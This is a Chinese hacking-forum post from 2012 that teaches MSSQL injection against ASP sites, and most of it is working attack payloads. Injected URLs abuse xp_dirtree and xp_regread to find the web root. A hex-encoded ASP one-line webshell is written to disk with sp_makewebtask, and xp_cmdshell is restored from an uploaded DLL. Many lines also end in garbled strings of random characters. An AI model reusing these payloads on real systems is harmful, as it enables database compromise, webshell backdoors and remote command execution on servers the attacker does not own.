中国网络渗透测试联盟

标题: MSsqlL注入取得网站路径最好的方法 [打印本页]

作者: admin    时间: 2012-9-13 17:20
标题: MSsqlL注入取得网站路径最好的方法
好,我们exec master..xp_dirtree'd:/test'. }5 p( I9 M1 y5 W" v7 t
假设我们在test里有两个文件夹test1和test2在test1里又有test3
4 a2 Q4 b8 R; f- Z% `结果显示) n9 \! H) g( @: z
+ X; l/ b1 M2 k
subdirectory depth
2 I  ?! G1 H: X% I7 x# u1 p1 V4 {6 Jtest1 1
/ J$ y5 |( d) j& z. H" Stest3 28 F* u) Q) ^- F: E* x
test2 1
; x6 Y/ m  Y3 V$ }$ p9 {8 z! [5 `2 [0 F; D# r+ l8 ^- u) H& T
哈哈发现没有那个depth就是目录的级数0 ^. e! s8 c$ i7 S5 \0 ]
ok了,知道怎么办了吧
2 ~, O& F* {$ S  h$ ~& E. ~* B& B5 M$ ]6 I# S
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--
9 e" u- |3 u. Yhttp://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' -- % c& [$ Y( Q5 P; ~
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-
6 N4 u4 M( j( j8 Z$ x* H" O% ^: v/ S3 o1 D) A; m, D
只要加上id=1,就是第一级目录 。
! u+ _5 v& U# \" X8 u. J- X$ |, H& e$ M
/ I# y5 L5 F: D' C  L, _% z! _
通过注册表读网站路径:! k# t$ \3 N' u6 {

' k$ l% M/ W  e  Y  I' j) G1.;create table [dbo].[cyfd] ([gyfd][char](255));5 `  ?  t; U8 i" o* F' r# e4 P
5 R2 z# P( I- y& n! F( y
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--" F5 Z" z% f# t6 c0 L  u! d* Q
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
! Q" R5 f1 J; S8 M% b, u5 ?) K1 G( B+ I, B
3.and 1=(select count(*) from 临时表 where 临时字段名>1)
, D' i) ]! b8 _. nand 1=(select count(*) from cyfd where gyfd > 1) ! g8 }: D  i1 ]2 [2 G3 E
这样IE报错,就把刚才插进去的Web路径的值报出来了
$ f% l0 [. V# L" G. K, N8 k- N) F2 z8 _
4.drop table cyfd;-- 删除临时表
7 b) A9 P, I. S# A. z1 y: H. u( r0 g; X1 v7 f7 f) f4 Q0 ]
获得webshell方法:
/ C2 N" A6 j* ~9 H, B# f; l1.create table cmd (a image)-- \**cmd是创建的临时表
, H. Z3 Z% c" v) K$ P; K: M
, m9 i4 W1 X/ i2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
) B; J. v! |$ H7 A! t# }: |- O( T( B7 Y% c) F4 K

# l! z" h, {1 f3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'5 f* L* ?* {4 c2 ]2 s- d& [
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'4 l1 V. }& p- t  U0 m/ \. F. U

' I% }5 T5 V8 s, o" M5 {' }4.drop table cmd;-- 删除cmd临时表3 b/ F$ v; j! ^( i& C6 E/ {
# \8 J% z9 |" }3 D/ W2 {
恢复xp_cmdshell方法之一:
- }0 `/ e+ e0 P+ ~) h! {4 k5 o5 \# V我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:( t0 o$ L2 U: q* H* n8 ?
http://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'
! |! `: |( C- z! Y- n/ U- P恢复,支持绝对路径的恢复哦。:)% b5 x& D: D$ o$ c  V0 B0 U0 ~* B





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2